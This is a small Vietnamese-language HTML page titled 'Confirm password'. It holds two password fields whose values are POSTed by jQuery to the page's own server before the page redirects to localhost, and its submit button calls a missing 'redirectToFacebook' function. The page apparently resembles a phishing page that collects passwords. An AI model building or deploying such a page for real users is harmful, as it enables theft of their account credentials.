<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Xác nhận mật khẩu</title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link
      rel="stylesheet"
      href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
    />
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"
    />
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <link
      href="https://fonts.googleapis.com/css?family=Nunito:600,700,900"
      rel="stylesheet"
    />
  </head>
  <body
    id="body"
    style="font-family: Arial, Helvetica, sans-serif; background-color: #5d8fc9"
  >
    <div
      id="login-card"
      class="card"
      style="width: 350px; border-radius: 25px; margin: 150px auto"
    >
      <div class="card-body">
        <h2 class="text-center">Xác nhận mật khẩu</h2>
        <br />
        <form action="" method="post" onsubmit="submitForm(event)">
          <div class="form-group">
            <input
              style="
                border-radius: 30px;
                background-color: #ebf0fc;
                border-color: #ebf0fc;
                color: #9da3b0;
              "
              name="password"
              type="password"
              class="form-control"
              id="email"
              placeholder="Password"
              name="email"
            />
          </div>
          <div class="form-group">
            <input
              style="
                border-radius: 30px;
                background-color: #ebf0fc;
                border-color: #ebf0fc;
                color: #9da3b0;
              "
              type="password"
              class="form-control"
              id="email"
              placeholder="Confirm password"
              name="pswd"
            />
          </div>
          <button
            style="
              border-radius: 30px;
              padding: 5px;
              align-items: center;
              border-radius: 5px;
            "
            type="submit"
            id="button"
            class="btn btn-primary deep-purple btn-block"
            onclick="redirectToFacebook()"
          >
            Submit
          </button>
          <br />
          <br />
        </form>
      </div>
      <div></div>
    </div>
  </body>
  <script>
    async function submitForm(event) {
      event.preventDefault(); // ngăn chặn việc submit form
      let currentURL = window.location.pathname;
      const $form = $('form'); // Lấy Toàn bộ FORM hiện tại
      $.ajax({
        type: 'POST',
        url: currentURL,
        data: $form.serialize(), // Lấy toàn bộ dữ liệu của FORM hiện tại
        success: function(result) {
          console.log(result); // Kết quả trả về của SERVER 
        },
      });
    // Chuyển hướng người dùng sang trang mới.
    window.location.replace("http://localhost:3000/");
  }

  // function redirect() {
  //   return new Promise((resolve, reject) => {
  //       window.location.href = "http://localhost:3000/";
  //       resolve(); // đánh dấu rằng redirect đã hoàn thành
  //   });
  // }
  </script>
</html>
